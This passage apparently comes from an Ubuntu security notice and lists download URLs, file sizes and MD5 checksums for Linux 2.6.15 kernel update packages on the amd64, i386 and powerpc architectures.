http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-54.77_all.deb Size/MD5: 5167494 b57a1f066e6e27335636d97032bac1e4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-54.77_all.deb Size/MD5: 95350 6585056cad015d6ca7e28ab593cd8b69 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77_all.deb Size/MD5: 44742940 96f1bf40f8e1197b05d8cc2892f2c145 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 22354 a8efeb55cc67813d523cce4e9a8540ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 44770 ceb8d616dcdd3e0acd2c5f1bc0957167 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 2306 13cb4639cc7517e3111efdea783b906e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 36252 5ef331e5a71c799d054ed67e1af7afb6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 102298 94937c4a9294258227c971c9c5e05c5b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 38894 eb294ea73d31f1c2f9fda6618ec63770 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 49144 b633a70773bbbe8acf959b99056c8117 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 176712 02c0b79f0fa0b1ebf343781974474a4e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 36776 8a9d598a72f8199cafd120f3aec583c1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 142248 3adf2b7652974e829eaeb41d822a5011 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 51070 25ec529d7f82bfb0ddcd981304434934 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 140616 bf360bdcf71309b158123ce3070aaaf9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 286860 041ee91c6050c552bd52930dfb7c9f6b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 97798 b66af76803a50cf7a3b22c2fbb9f00b4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 1651646 756c6cea34752f0bf7a1e829db020e57 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb Size/MD5: 871700 f51a4a973ece89338d4843d27a5ced94 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb Size/MD5: 872620 cef392fe29c4a2dcfa1ffb9607f990eb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb Size/MD5: 872046 e9a140b82a6800dd7c08d8b744e75e2f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb Size/MD5: 872590 46b39ade35d2e36728d913fe84b6f79d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_amd64.deb Size/MD5: 6925720 a40915984f97b8e817774d8d56155484 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb Size/MD5: 20816072 98817474a9a662d4c5d79811547b98ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb Size/MD5: 20785638 cbf0cd088aeff7b0b87df905b9e8468f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb Size/MD5: 21630872 f56a80007a836fec66ef9a2a94883d97 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb Size/MD5: 19903700 98158564170bf417e3ba7f91263f5f31 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 15646 3894b718b3d312c48c92d9ac52252e5d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 240370 a8ee1ef17d8c778484a1b5fdc14777b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 202636 2fbb7c2f21624e8c39388ac167f1bca3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 1048602 97b108097bf19f308240d1413ad38b64 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 1542980 c57046562d168b6e8ee13a25fea0347c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 161648 c9463e7a0ebb0c3879f7a6d644751c85 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 9832 88ec0bfa3382802a777bcbf9dc7d2220 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 80862 c850080cdc776aabab0c7e0e89cdb13d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 49172 99f5fcc78a1beea9bbbf9cb455c45707 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 35168 9a07d29dedcbed5a44079e64e2bfc911 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 70884 86d8342ace381ebf07b2f4ead760797c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 6224 55a1df7fa8889b89cd3a009d2d84cbb0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 9060 9805d4d7b24730a66d881ec8ffccc203 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 57898 4a0c6ab2237785c56a140bb82818578a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 123332 cfa831d03acaba7fdcd38cc296245fd7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 101028 f5be2f6c6c299d7c732b59fbfc2ea586 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 79250 a59e9df8e087eac06df9fbda8a8a6405 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 1594790 0bc41203b7830a51a6e1a1b9f981ab15 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 72306 6acc47f96a766cc043ee2a4f47edd3d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 12654 5a615c1146e10d37ef89d0d2ffaf770e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 33736 850c53ba72802eba8128f9c69786b663 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 138534 82827eb2785d66387e75873bcbcb84f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 38938 bb5ec1051b41c083cdd18225b4f0ac24 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb Size/MD5: 278746 1a19131977b00e345ca43f2da7d78f60 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 18976 cc2753f5656925c3015c39979cb8cff3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 43460 a322e932de50b99745f263a9c2d07e00 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 105212 c109dd4fd0061a526e506e6419e71b24 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 2286 47108cbcb70c3749d2b045c6f8c1a1c7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 34576 df9c1643a4d064f3db582744ad47a9e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 96952 0fa666be29393ff121f0ff64c45495ea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 37102 f4f2833e372e12fabc8237f05e45bf6d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 44078 cdcdb874e1bc26abeec66c66c39dd6e2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 167754 575f5b4208371c2e5d11fdd1d8856119 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 33938 8578c3357a6f1ddfddaf863d2ac2cfb4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 137870 f46efe5131f63f6f6ee7757d1418b81d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 46894 7dc4dc6732d97dcf4ec8e854f5f563c6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 132998 a70d2f28ac9f08ef9b505fbe034fa9e2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 273450 d6d45586cf1dfff150b030e9ef3de755 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 102260 7216111ca2c37fc6ef3d6757254f8261 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 1596062 4d81a723f97979546f7a7032411e88ff http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-386_2.6.15-54.77_i386.deb Size/MD5: 863226 924f92be148cb1bb13db4f7252fd644c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-686_2.6.15-54.77_i386.deb Size/MD5: 858374 ddd82deb53082e6ce4b6791ed14dd44f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-k7_2.6.15-54.77_i386.deb Size/MD5: 859558 59451d436d231e187ec193aa4abfe1fc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb Size/MD5: 867408 e88f0427e3f965f7c8cfd10cf65255a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server_2.6.15-54.77_i386.deb Size/MD5: 859510 ff4d32a7389bf7ecdb224525699c1868 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_i386.deb Size/MD5: 6917458 fd0a57262224b5c9c03b392deee6dba2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-386_2.6.15-54.77_i386.deb Size/MD5: 21712838 ce53ee29a36dd9cd9228176e6a67d0cf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-686_2.6.15-54.77_i386.deb Size/MD5: 22508152 f8977584a67f926bce6e172b61d483cc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-k7_2.6.15-54.77_i386.deb Size/MD5: 22255354 85be88ae00e9c10d859985cfe320b9ba http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb Size/MD5: 23618958 0dd94a3c4bc391252914ef536a049eaf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server_2.6.15-54.77_i386.deb Size/MD5: 23173694 36c092afcfd842937423257362deb71d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 15510 9bfea12610a193ecbf077c7dc10b67a2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 238530 0d6767483144ccbdfb4d5496dfa1b890 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 197046 b779aa690688bd0ce620b3feed37c72f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 1048392 251f698fe32b7aa18b52b8c930d997a4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 1740818 be462a74a24ef70208e5af89879da1fb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 160828 bee9438c9a9c524335bbde0b07be1313 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 9166 1f281ddb8155bd44eca2c0097bd3412e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 76484 024d47a314d9e6567fb071e2814622d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 53256 456e910d9e3bde1047c24daef0b5658e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 33054 3b0bc0f0738ca6080dd9446a54b22ac7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 85630 b46b2de723e39a047552d1bf53422286 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 6028 efd9e548799433f47e80be328f92e779 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 8762 da11c1b27b852c13e054d4aec99b9f13 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 53636 e7c55e0573e7aabc1098bbe9d37c6910 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 130776 a254b737d82cd35230628f67effd60d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 98432 f772e922c5ca1f3ea8249c702e72cc73 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 77184 1a3d5fed7e2593cd1e324e81e8f73fbc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 1768386 bba934fcf1768f4e6616783b67cc0cb6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 69570 672c7fe6f046dc6ec11486a62622ed26 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 11758 a86954df8c28e894e6849038aec6dd3e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 36008 fc0d3c2b5b263bcd9260dcb8a75cf2e3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 132566 75fad8a0bac352909402ff2b333fc917 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 38564 48aa028998c1382beeecf660aa5aac3a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb Size/MD5: 299114 f11e7eb80349e04b8f23d8a049f76b56 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 23724 2db2adaa57d92b7f48688f95179e15e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 25950 95c01793a23a24cbff49964e4b8c5585 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 49326 ab284f2d44d7a2bbc5ea52e67f613b23 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 51530 a600f307f0f91779acc5c1980c4c3223 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 2308 4effd1e0af9c3f48e2243691eb8ff6be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 2482 a4633265ec8c02ba24ea472625a3a3ee http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 40196 21e77905b68f5d3872662ab5948dfd94 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 43758 e439eec68bed9e401fec40c0031434d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 112596 caf6e08a7b71ca1051b5d94c62029fe3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 120666 feb6891c9b38bbcc0d58026e14e2a0f5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 40850 d1933a4df097dba261b11bbae450cc95 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 45958 17b93bb9695be9a7cc0cb8bdac26e767 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 29032 6ca496a4614fc2f0bf880a9f0fdbcb35 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 29900 538fd9bb6ec6ff9c1cb4c61506a2094e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 211404 5d35841b61601520fa369d152d3bbd42 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 225214 3866f620a880044623bbc963a1b15f8f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 45056 3fd6ac720a4053a1554c515dbdd60d09 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 40220 342eae2faccd8a8e8235ccbe7a118f44 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1936 6eb08d519ab2bf1a5f5fac6e0c832e6d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 2200 a2f7579c4986495691a7b124fc34c7c0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 80680 37cbcb404f7c6d42ddf270cb222d97a0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 86078 ffb8b233eb68841688aa616f1880fcb7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 111644 8d3233bee5a2d55582bda79b6bd22f1c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 125774 b1d8fd5c48d3d50a25da84576e3b1c2e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 53410 9737ace229facb52faba8819b39aaa4f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 58474 c0dfc0546cd6a326e8e5372286147ebc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 147772 5add6e71d59aa7b22544c89d236f1264 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 161708 2e4eaeb64a8a149fe0e89a6aa32c4273 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 317494 e1e4733d8591ebe9372fe88ed3f0c816 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 287602 85599af30985f874baa2005e68247c8a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 115854 b64bea5344a06582f592f8de8493fea0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 116514 54a687f3c7d632b17400826c8358eec2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1924292 af79708a135129928126925812c5e985 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 2447446 600b87a4f5376d7ed6685dde273d1ca6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb Size/MD5: 873400 cdb7cb415d400e8e8e9d69fa6a21549d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb Size/MD5: 870866 7252b4b7c1a9b0d65e69939157d86e13 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb Size/MD5: 868624 fa84e5dae2ee6f9986de8772a1357e23 